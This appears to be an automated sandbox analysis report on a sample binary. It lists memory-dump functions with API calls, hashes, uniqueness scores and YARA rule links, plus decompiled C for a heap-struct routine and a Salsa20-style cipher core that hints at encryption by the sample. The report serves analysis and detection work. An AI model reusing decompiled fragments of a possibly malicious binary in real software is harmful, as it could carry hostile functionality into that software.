Uniqueness Score: 0.03%

Function 00425845, Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 0042094E: RtlEnterCriticalSection.NTDLL(?), ref: 0042095D

EnumSystemLocalesW.KERNEL32(00425838,00000001), ref: 0042587D

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 5c34c800687a55b6517648ca606e9e2700fab3356d3ebfe5c17237073af0e4e1
Instruction ID: 39d5c8221a65253c12b4579c19f521ce25332ee6067a92baf5e0ef13c534ddfc
Opcode Fuzzy Hash: 5c34c800687a55b6517648ca606e9e2700fab3356d3ebfe5c17237073af0e4e1
Instruction Fuzzy Hash: 2BF05E75A00214EFE710EFA9E802B8D7BF0EF09325F10416AF815DB2A1CBB88941CF49

Uniqueness

Uniqueness Score: 0.03%

Function 00425DD7, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,?,?,0042431A,?,20001004,?,00000002,00000000,?,?), ref: 00425E0B

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 131ba581c11fe6e941e3d14f54017ed4b89f0ecab486acfed7a93368f44a5712
Instruction ID: 8f9341d0e050de44bb0a550a19ab069d8afff5f29354127d242f2aa602b19c92
Opcode Fuzzy Hash: 131ba581c11fe6e941e3d14f54017ed4b89f0ecab486acfed7a93368f44a5712
Instruction Fuzzy Hash: 98E04871604528B7CF122F61EC04E9F3E15EF44750F454016FC4565221C7769D21E6D9

Uniqueness

Uniqueness Score: 0.00%

Function 00425DD7, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,00000002,?,?,?,0042A118,?,00001004,?,00000002,?,?,00000000), ref: 00425E0B

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 43f3f7ce38937c86cf6d6fea6f524fdace6e039981f39e21221937caaf168a07
Instruction ID: 8f9341d0e050de44bb0a550a19ab069d8afff5f29354127d242f2aa602b19c92
Opcode Fuzzy Hash: 43f3f7ce38937c86cf6d6fea6f524fdace6e039981f39e21221937caaf168a07
Instruction Fuzzy Hash: 98E04871604528B7CF122F61EC04E9F3E15EF44750F454016FC4565221C7769D21E6D9

Uniqueness

Uniqueness Score: 0.00%

Function 0041E147, Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

0, xrefs: 0041E2DF

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 0
API String ID: 3761405300-4108050209
Opcode ID: c8a7eb77b9f54aa16db0a44ce56fe9138122aeff10b84b4938c5efa36f1f4e44
Instruction ID: e79764fe936d8b62d763b7d41cc209e7d5ec42ae1b1c17d3e0d37d800a71d98a
Opcode Fuzzy Hash: c8a7eb77b9f54aa16db0a44ce56fe9138122aeff10b84b4938c5efa36f1f4e44
Instruction Fuzzy Hash: 7761387C740208A6DB389A5788A57FF73AAAB81704F14056FEC469B380D73D9DC2934E

Uniqueness

Uniqueness Score: 0.15%

Function 0041E3AE, Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

0, xrefs: 0041E546

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: 0
API String ID: 3761405300-4108050209
Opcode ID: 0c128b4a8d969e4f38f581f1894fb688491c07f9948b4be857cc1dc576f61d80
Instruction ID: 3b658e7ca4237e80bb72f06d793e75ab8a7752b9ba2ac7187d4492651047ee84
Opcode Fuzzy Hash: 0c128b4a8d969e4f38f581f1894fb688491c07f9948b4be857cc1dc576f61d80
Instruction Fuzzy Hash: E3614B7874020466DB389A6B8985BFF7396AF45708F54092FEC42DB381E71D9DC2835E

Uniqueness

Uniqueness Score: 0.15%

Function 0041E147, Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

0, xrefs: 0041E2DF

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 96035db067aacd4fb1ad40435a49525cd2164a0af05c6fa22368049cfd0a971b
Instruction ID: e79764fe936d8b62d763b7d41cc209e7d5ec42ae1b1c17d3e0d37d800a71d98a
Opcode Fuzzy Hash: 96035db067aacd4fb1ad40435a49525cd2164a0af05c6fa22368049cfd0a971b
Instruction Fuzzy Hash: 7761387C740208A6DB389A5788A57FF73AAAB81704F14056FEC469B380D73D9DC2934E

Uniqueness

Uniqueness Score: 0.15%

Function 0041E3AE, Relevance: 1.5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

Strings

0, xrefs: 0041E546

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 1527960571a5ba2139deec3d3a3360ff25b1d2e8cc23c159cec0286b378d234d
Instruction ID: 3b658e7ca4237e80bb72f06d793e75ab8a7752b9ba2ac7187d4492651047ee84
Opcode Fuzzy Hash: 1527960571a5ba2139deec3d3a3360ff25b1d2e8cc23c159cec0286b378d234d
Instruction Fuzzy Hash: E3614B7874020466DB389A6B8985BFF7396AF45708F54092FEC42DB381E71D9DC2835E

Uniqueness

Uniqueness Score: 0.15%

Function 0041DF13, Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

0, xrefs: 0041E08F

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: __cftof
String ID: 0
API String ID: 1622813385-4108050209
Opcode ID: 819390e76659804e5214e7fd9619bc044e815b358ca2719cff687063d7a43bb4
Instruction ID: 8ac85b356442afe801585994c1d5e99848d31ba863687120f7afcd881667e9ff
Opcode Fuzzy Hash: 819390e76659804e5214e7fd9619bc044e815b358ca2719cff687063d7a43bb4
Instruction Fuzzy Hash: 445139B4A00B5856DB38892A89957FF6B999B0A304F18001FEC47D77C2D65E9EC7831E

Uniqueness

Uniqueness Score: 0.15%

Function 0041DF13, Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

0, xrefs: 0041E08F

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: __cftof
String ID: 0
API String ID: 1622813385-4108050209
Opcode ID: 4643fdee30138f380050323a2c1722e9931c9a83b54c211ae97911c4d25b5bea
Instruction ID: 8ac85b356442afe801585994c1d5e99848d31ba863687120f7afcd881667e9ff
Opcode Fuzzy Hash: 4643fdee30138f380050323a2c1722e9931c9a83b54c211ae97911c4d25b5bea
Instruction Fuzzy Hash: 445139B4A00B5856DB38892A89957FF6B999B0A304F18001FEC47D77C2D65E9EC7831E

Uniqueness

Uniqueness Score: 0.15%

Function 00401B43, Relevance: 1.3, APIs: 1, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401B43(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88) {
				intOrPtr* _t68;

				_t68 = __ecx;
				 *__ecx = _a4;
				 *((intOrPtr*)(__ecx + 4)) = _a8;
				 *((intOrPtr*)(__ecx + 0xc)) = _a12;
				 *((intOrPtr*)(__ecx + 0x10)) = _a16;
				 *((intOrPtr*)(__ecx + 0x1c)) = _a24;
				 *((intOrPtr*)(__ecx + 0x24)) = _a28;
				 *((intOrPtr*)(__ecx + 0x28)) = _a32;
				 *((intOrPtr*)(__ecx + 0x30)) = _a36;
				 *((intOrPtr*)(__ecx + 0x34)) = _a40;
				 *((intOrPtr*)(__ecx + 0x3c)) = _a44;
				 *((intOrPtr*)(__ecx + 0x40)) = _a48;
				 *((intOrPtr*)(__ecx + 0x48)) = _a52;
				 *((intOrPtr*)(__ecx + 0x4c)) = _a56;
				 *((intOrPtr*)(__ecx + 0x54)) = _a60;
				 *((intOrPtr*)(__ecx + 0x58)) = _a64;
				 *((intOrPtr*)(__ecx + 0x60)) = _a68;
				 *((intOrPtr*)(__ecx + 0x64)) = _a72;
				 *((intOrPtr*)(__ecx + 0x74)) = _a76;
				 *((intOrPtr*)(__ecx + 0x78)) = _a80;
				 *((intOrPtr*)(__ecx + 0x80)) = _a84;
				 *((intOrPtr*)(__ecx + 0x18)) = 1;
				 *((intOrPtr*)(__ecx + 0x88)) = _a88;
				 *((intOrPtr*)(_t68 + 0x8c)) = GetProcessHeap();
				return _t68;
			}

0x00401b4a
0x00401b4c
0x00401b51
0x00401b57
0x00401b5d
0x00401b63
0x00401b69
0x00401b6f
0x00401b75
0x00401b7b
0x00401b81
0x00401b87
0x00401b8d
0x00401b93
0x00401b99
0x00401b9f
0x00401ba5
0x00401bab
0x00401bb1
0x00401bb7
0x00401bbd
0x00401bc6
0x00401bcd
0x00401bd9
0x00401be3

APIs

GetProcessHeap.KERNEL32 ref: 00401BD3

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: a709a53e8b10322f0f9afe68bd5864fe0389e6e3de942f12ded897e0411eab0b
Instruction ID: e18c73f136c0dc58f627a57d9c802187bc01423bb28b8dda5894d1acf4e8d6b3
Opcode Fuzzy Hash: a709a53e8b10322f0f9afe68bd5864fe0389e6e3de942f12ded897e0411eab0b
Instruction Fuzzy Hash: 7321CEB4A01B589FC7A0CF6DC580A86BBF0BB0C754B50992AFD9AD3B10D775E8448F50

Uniqueness

Uniqueness Score: 0.07%

Function 0042C5C5, Relevance: 1.3, Strings: 1, Instructions: 41UNIQUE

Download Yara Rule

Strings

xD, xrefs: 0042C615

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID:
String ID: xD
API String ID: 0-1866785068
Opcode ID: d884ebffd40fbddeecea32723d98810ef348a61b370a61c5308b65227f9b00d2
Instruction ID: d95c023d4befab96fbdec0818f7cc409b16248ddbc57823aa1e341ce99e1e910
Opcode Fuzzy Hash: d884ebffd40fbddeecea32723d98810ef348a61b370a61c5308b65227f9b00d2
Instruction Fuzzy Hash: F7F0F632754234ABDB26CA9DB948B5D73ACF705B50F551197E504E7350C2F9DD0187C8

Uniqueness

Uniqueness Score: 100.00%

Function 0042C5C5, Relevance: 1.3, Strings: 1, Instructions: 41UNIQUE

Download Yara Rule

Strings

xD, xrefs: 0042C615

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID:
String ID: xD
API String ID: 0-1866785068
Opcode ID: d884ebffd40fbddeecea32723d98810ef348a61b370a61c5308b65227f9b00d2
Instruction ID: d95c023d4befab96fbdec0818f7cc409b16248ddbc57823aa1e341ce99e1e910
Opcode Fuzzy Hash: d884ebffd40fbddeecea32723d98810ef348a61b370a61c5308b65227f9b00d2
Instruction Fuzzy Hash: F7F0F632754234ABDB26CA9DB948B5D73ACF705B50F551197E504E7350C2F9DD0187C8

Uniqueness

Uniqueness Score: 100.00%

Function 0042C54C, Relevance: 1.3, Strings: 1, Instructions: 30UNIQUE

Download Yara Rule

Strings

tD, xrefs: 0042C584

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID:
String ID: tD
API String ID: 0-2863926317
Opcode ID: b5d1a4a341f8bf0f713e70f6d2e1c65a40bac2a4f03cabb3b5c32d7d70518f9c
Instruction ID: ecb27e43d90eb04eba7c5563f873d6518feb57cd5db386b0330ee0636d8a82ea
Opcode Fuzzy Hash: b5d1a4a341f8bf0f713e70f6d2e1c65a40bac2a4f03cabb3b5c32d7d70518f9c
Instruction Fuzzy Hash: D9F0A031A10634ABCB22CB4DE844A4973ACFB05B14F51429BF404D7200C6B8EE80C7C4

Uniqueness

Uniqueness Score: 100.00%

Function 0042C54C, Relevance: 1.3, Strings: 1, Instructions: 30UNIQUE

Download Yara Rule

Strings

tD, xrefs: 0042C584

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID:
String ID: tD
API String ID: 0-2863926317
Opcode ID: b5d1a4a341f8bf0f713e70f6d2e1c65a40bac2a4f03cabb3b5c32d7d70518f9c
Instruction ID: ecb27e43d90eb04eba7c5563f873d6518feb57cd5db386b0330ee0636d8a82ea
Opcode Fuzzy Hash: b5d1a4a341f8bf0f713e70f6d2e1c65a40bac2a4f03cabb3b5c32d7d70518f9c
Instruction Fuzzy Hash: D9F0A031A10634ABCB22CB4DE844A4973ACFB05B14F51429BF404D7200C6B8EE80C7C4

Uniqueness

Uniqueness Score: 100.00%

Function 0042AF59, Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: DecodePointer
String ID:
API String ID: 3527080286-0
Opcode ID: 0e18a4e34f60966bda81645225ddf1d89845c2bd107febad892b64bf5eb3aa84
Instruction ID: 2d7c20371df9cc8678e3058a84f225789ccd260e58cdc67c45861803ea4d059b
Opcode Fuzzy Hash: 0e18a4e34f60966bda81645225ddf1d89845c2bd107febad892b64bf5eb3aa84
Instruction Fuzzy Hash: D8320321E69F114DD7239634E922336A348EFB73C4F55E737E81AB5AA5EF28C4834144

Uniqueness

Uniqueness Score: 0.00%

Function 00419275, Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 3ce0f8c7812c8efdf61a4cb5cac05f9478907c4b78fca51c1d0374f802b6087e
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: 13C1B5332091630ADB2D463985340BFBBA15B927B135A075FD8B7DB2C4EE28CDA5D624

Uniqueness

Uniqueness Score: 0.00%

Function 004196AA, Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: b8952a7193c88a85c1cb941ddfff901358e2f1b3d1f7b6e5fcc3a70bfc627f80
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: F9C1A4332051A309DF2D463985340BFBBA15F927B135A176FD8B6CB2C4EE28CDA5D624

Uniqueness

Uniqueness Score: 0.00%

Function 00418E40, Relevance: .3, Instructions: 331COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: a0429b5615b44f87ec81f406795a9d256abd5049c9c73f3244757058a823f0be
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: 04C1A53320516309DF2D4639C5740BFBBA15BA27B135A076FD8B7CB2C4EE28C9A5D624

Uniqueness

Uniqueness Score: 0.00%

Function 0042EC91, Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ErrorFeatureLastPresentProcessProcessor_free$CurrentInfoLocaleTerminate___raise_securityfailure
String ID:
API String ID: 3458015420-0
Opcode ID: 540d327d7142c2d3e930ae2058b664ad52d26fcba785d4f5851a02a47b036552
Instruction ID: 4e9efb47417fc3b98881168cc6e4603419c33669321fff063707418cec018333
Opcode Fuzzy Hash: 540d327d7142c2d3e930ae2058b664ad52d26fcba785d4f5851a02a47b036552
Instruction Fuzzy Hash: 67B14C357007519BDB34DF26DC82BB7B3A8EF40308F94456FEA47C6680EA79A945CB18

Uniqueness

Uniqueness Score: 0.00%

Function 0042EC91, Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: ErrorLast_free$InfoLocale
String ID:
API String ID: 2003897158-0
Opcode ID: 859077c937048fb8f9831184cdafe5f3cc313f84c9d01d75ab3af1b1defc663b
Instruction ID: 4e9efb47417fc3b98881168cc6e4603419c33669321fff063707418cec018333
Opcode Fuzzy Hash: 859077c937048fb8f9831184cdafe5f3cc313f84c9d01d75ab3af1b1defc663b
Instruction Fuzzy Hash: 67B14C357007519BDB34DF26DC82BB7B3A8EF40308F94456FEA47C6680EA79A945CB18

Uniqueness

Uniqueness Score: 0.00%

Function 00418A28, Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 168f1e59290d06a65bdbe1905404f5ef8e2f36ec3a8cc261582627c487907ff6
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: D2C1A63320916309DF6D4639C5340BFBAA15FA27B131A075FD8B7CB2C4EE28D9A5D624

Uniqueness

Uniqueness Score: 0.00%

Function 00407D0B, Relevance: .2, Instructions: 221
COMMONCrypto

Download Yara Rule

C-Code - Quality: 69%

			E00407D0B(void* _a4, void* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void _v120;
				signed int _t167;
				signed int _t198;
				signed int _t200;
				signed int _t206;
				signed int _t210;
				signed int _t216;
				signed int _t218;
				signed int _t229;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t245;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				signed int _t253;
				signed int _t255;
				signed int _t257;
				signed int _t259;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t269;
				signed int _t270;
				void* _t272;

				_t233 = 0x10;
				_v56 = 0xa;
				memcpy( &_v120, _a8, _t233 << 2);
				_t245 = _v72;
				_t235 = _v60;
				_t239 = _v64;
				_t269 = _v68;
				_t229 = _v76;
				_v8 = _v80;
				_v36 = _v84;
				_v24 = _v88;
				_v48 = _v92;
				_v44 = _v96;
				_v32 = _v100;
				_v20 = _v104;
				_v40 = _v108;
				_v16 = _v112;
				_v12 = _v116;
				_t167 = _v120;
				_v52 = _t245;
				_v28 = _t167;
				do {
					asm("rol eax, 0x7");
					_v20 = _v20 ^ _t167 + _t245;
					asm("rol eax, 0x9");
					_v24 = _v24 ^ _v20 + _v28;
					asm("rol eax, 0xd");
					_t247 = _v52 ^ _v24 + _v20;
					_v52 = _t247;
					asm("ror eax, 0xe");
					_v28 = _v28 ^ _v24 + _t247;
					asm("rol eax, 0x7");
					_v36 = _v36 ^ _v12 + _v32;
					asm("rol eax, 0x9");
					_t270 = _t269 ^ _v36 + _v32;
					_t248 = _v44;
					asm("rol eax, 0xd");
					_v12 = _v12 ^ _v36 + _t270;
					asm("ror eax, 0xe");
					_v32 = _v32 ^ _v12 + _t270;
					asm("rol eax, 0x7");
					_t240 = _t239 ^ _v8 + _t248;
					asm("rol eax, 0x9");
					_v16 = _v16 ^ _v8 + _t240;
					asm("rol eax, 0xd");
					_t249 = _t248 ^ _v16 + _t240;
					_v44 = _t249;
					asm("ror eax, 0xe");
					_v8 = _v8 ^ _v16 + _t249;
					asm("rol eax, 0x7");
					_t251 = _v40 ^ _t229 + _t235;
					_v40 = _t251;
					asm("rol eax, 0x9");
					_t253 = _v48 ^ _t251 + _t235;
					_v48 = _t253;
					asm("rol eax, 0xd");
					_t230 = _t229 ^ _v40 + _t253;
					asm("ror eax, 0xe");
					_t236 = _t235 ^ _t253 + _t230;
					asm("rol eax, 0x7");
					_v12 = _v12 ^ _v28 + _v40;
					_t198 = _v12;
					_v116 = _t198;
					asm("rol eax, 0x9");
					_v16 = _v16 ^ _t198 + _v28;
					_t200 = _v16;
					_v112 = _t200;
					asm("rol eax, 0xd");
					_t255 = _v40 ^ _t200 + _v12;
					_v40 = _t255;
					asm("ror eax, 0xe");
					_v108 = _t255;
					_t257 = _v28 ^ _v16 + _t255;
					asm("rol eax, 0x7");
					_v44 = _v44 ^ _v32 + _v20;
					_t206 = _v44;
					_v96 = _t206;
					asm("rol eax, 0x9");
					_v28 = _t257;
					_v120 = _t257;
					_t259 = _v48 ^ _t206 + _v32;
					_v48 = _t259;
					asm("rol eax, 0xd");
					_v20 = _v20 ^ _v44 + _t259;
					_t210 = _v20;
					_v104 = _t210;
					asm("ror eax, 0xe");
					_v92 = _t259;
					_t261 = _v32 ^ _t210 + _t259;
					_v32 = _t261;
					_v100 = _t261;
					_t262 = _v36;
					asm("rol eax, 0x7");
					_t229 = _t230 ^ _v8 + _t262;
					asm("rol eax, 0x9");
					_v24 = _v24 ^ _v8 + _t229;
					_t216 = _v24;
					_v88 = _t216;
					asm("rol eax, 0xd");
					_t263 = _t262 ^ _t216 + _t229;
					_t218 = _t263;
					_v36 = _t263;
					_v84 = _t218;
					asm("ror eax, 0xe");
					_v8 = _v8 ^ _t218 + _v24;
					_v80 = _v8;
					asm("rol eax, 0x7");
					_t245 = _v52 ^ _t236 + _t240;
					_v52 = _t245;
					_v72 = _t245;
					asm("rol eax, 0x9");
					_t269 = _t270 ^ _t236 + _t245;
					asm("rol eax, 0xd");
					_t239 = _t240 ^ _t269 + _t245;
					asm("ror eax, 0xe");
					_t235 = _t236 ^ _t239 + _t269;
					_t134 =  &_v56;
					 *_t134 = _v56 - 1;
					_t167 = _v28;
				} while ( *_t134 != 0);
				_v76 = _t229;
				_v64 = _t239;
				_t241 = 0;
				_v60 = _t235;
				_t232 = _a8 -  &_v120;
				_v68 = _t269;
				do {
					 *((intOrPtr*)(_t272 + _t241 * 4 - 0x74)) =  *((intOrPtr*)(_t272 + _t241 * 4 - 0x74)) +  *((intOrPtr*)(_t272 + _t232 + _t241 * 4 - 0x74));
					_t241 = _t241 + 1;
				} while (_t241 < 0x10);
				_t237 = 0x10;
				return memcpy(_a4,  &_v120, _t237 << 2);
			}

0x00407d19
0x00407d1d
0x00407d24
0x00407d29
0x00407d2c
0x00407d2f
0x00407d32
0x00407d35
0x00407d38
0x00407d3e
0x00407d44
0x00407d4a
0x00407d50
0x00407d56
0x00407d5c
0x00407d62
0x00407d68
0x00407d6e
